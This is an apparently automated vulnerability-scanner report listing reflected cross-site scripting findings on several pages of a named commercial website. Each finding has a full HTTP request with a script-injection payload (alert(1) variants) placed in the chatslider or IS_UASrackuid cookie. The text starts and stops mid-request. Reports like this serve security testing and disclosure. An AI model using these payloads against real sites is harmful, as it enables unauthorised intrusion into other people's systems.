IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c267a"%3balert(1)//fac2b42b946 was submitted in the IS_UASrackuid cookie. This input was echoed as c267a";alert(1)//fac2b42b946 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c267a"%3balert(1)//fac2b42b946; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b62"%3balert(1)//d6e7b783043 was submitted in the chatslider cookie. This input was echoed as 84b62";alert(1)//d6e7b783043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D84b62"%3balert(1)//d6e7b783043; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c9e3"><script>alert(1)</script>1e8d5b8536e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2c9e3"><script>alert(1)</script>1e8d5b8536e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a48e"><script>alert(1)</script>30eacb06026 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84a48e"><script>alert(1)</script>30eacb06026; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 780c7"%3balert(1)//7931b2aafd3 was submitted in the IS_UASrackuid cookie. This input was echoed as 780c7";alert(1)//7931b2aafd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8780c7"%3balert(1)//7931b2aafd3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b54e"><script>alert(1)</script>d4066810c3f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D7b54e"><script>alert(1)</script>d4066810c3f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53282"%3balert(1)//32458e3be1a was submitted in the chatslider cookie. This input was echoed as 53282";alert(1)//32458e3be1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D53282"%3balert(1)//32458e3be1a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f635"%3balert(1)//e3b3b22ddba was submitted in the IS_UASrackuid cookie. This input was echoed as 2f635";alert(1)//e3b3b22ddba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f82f635"%3balert(1)//e3b3b22ddba; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:11:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39982
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f24"><script>alert(1)</script>1924ca8b755 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f882f24"><script>alert(1)</script>1924ca8b755; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff56a"><script>alert(1)</script>5e7f7cd480e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dff56a"><script>alert(1)</script>5e7f7cd480e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6820"%3balert(1)//ce16d48491a was submitted in the chatslider cookie. This input was echoed as b6820";alert(1)//ce16d48491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Db6820"%3balert(1)//ce16d48491a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23596"%3balert(1)//4125469c9b7 was submitted in the IS_UASrackuid cookie. This input was echoed as 23596";alert(1)//4125469c9b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f823596"%3balert(1)//4125469c9b7; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; 